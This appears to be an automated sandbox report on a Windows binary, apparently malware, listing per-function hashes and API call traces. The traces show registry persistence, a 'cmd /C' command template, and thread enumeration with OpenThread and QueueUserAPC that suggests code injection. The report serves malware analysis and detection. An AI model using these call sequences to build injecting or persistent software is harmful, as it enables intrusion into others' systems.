  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
